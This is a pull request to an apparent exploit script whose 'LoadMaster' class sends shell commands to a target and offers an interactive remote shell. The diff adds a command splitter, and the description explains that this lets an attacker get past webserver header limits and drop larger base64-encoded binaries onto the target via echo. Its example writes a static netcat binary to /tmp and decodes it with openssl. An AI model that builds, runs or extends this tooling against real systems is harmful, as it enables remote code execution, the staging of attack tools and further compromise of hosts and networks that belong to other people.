### PR TITLE
Add command splitter

### DIFF
--- a/exploit.py
+++ b/exploit.py
@@ -77,7 +77,7 @@ class LoadMaster:
                 timeout=20,
             )
             return self.parse_command_output(response.text)
-        except requests.RequestException as e:
+        except requests.RequestException:
             return None
 
     def parse_command_output(self, response_text):
@@ -126,19 +126,54 @@ class LoadMaster:
                 for future in as_completed(futures):
                     bar()
 
+    def split_commands(self, cmd_input):
+        """
+        Splits multiline input into shell-safe command chunks.
+        Each line is considered a separate command unless it contains shell chaining.
+        """
+        commands = []
+        buffer = ""
+
+        for line in cmd_input.splitlines():
+            stripped = line.strip()
+            if not stripped:
+                continue
+
+            buffer += stripped
+
+            # If the line ends with a shell chaining operator or is clearly a compound line
+            if re.search(r"(;|&&|\|\|)\s*$", stripped):
+                continue  # wait for next line
+
+            # Complete command
+            commands.append(buffer)
+            buffer = ""
+
+        if buffer:
+            commands.append(buffer)
+
+        return commands
+
+
     def interactive_shell(self, url):
-        session = PromptSession(history=InMemoryHistory())
-        self.custom_print("Interactive shell is ready. Please type your commands.", "!")
+        session = PromptSession(history=InMemoryHistory(), multiline=False)
+        self.custom_print("Interactive shell is ready. Type your commands. Use 'exit' to quit.", "!")
         while True:
             try:
-                cmd = session.prompt(HTML("<ansired><b># </b></ansired>"))
-                if cmd.lower() == "exit":
+                cmd_input = session.prompt(HTML("<ansired><b># </b></ansired>"))
+
+                if cmd_input.strip().lower() == "exit":
                     break
-                elif cmd.lower() == "clear":
+                elif cmd_input.strip().lower() == "clear":
                     self.console.clear()
-                else:
-                    result = self.send_command(cmd, url)
+                    continue
+
+                commands = self.split_commands(cmd_input)
+
+                for command in commands:
+                    result = self.send_command(command, url)
                     print(result if result else "No output.", "\n")
+
             except KeyboardInterrupt:
                 break
 


### PR DESCRIPTION
This change allows to execute multiple commands in separate requests.
That way you may exceed the 8kb header limitation of nginx and other webservers and e.g. "upload" larger b64 encoded binaries through echo commands if no outgoing connections are possible from the target subnet.

Example:
```bash
echo f0VMRgIBAQMAAAAAAAAAAAIAPgABAAAAAApAAAAAAABAAAAAAAAAALC9DAAAAAAA >> /tmp/nc64staticbased
echo AAAAAEAAOAAGAEAAHQAcAAEAAAAFAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA >> /tmp/nc64staticbased
...

# this can than be decoded with openssl
openssl base64 -d -in /tmp/nc64staticbased -out /tmp/nc64static
```

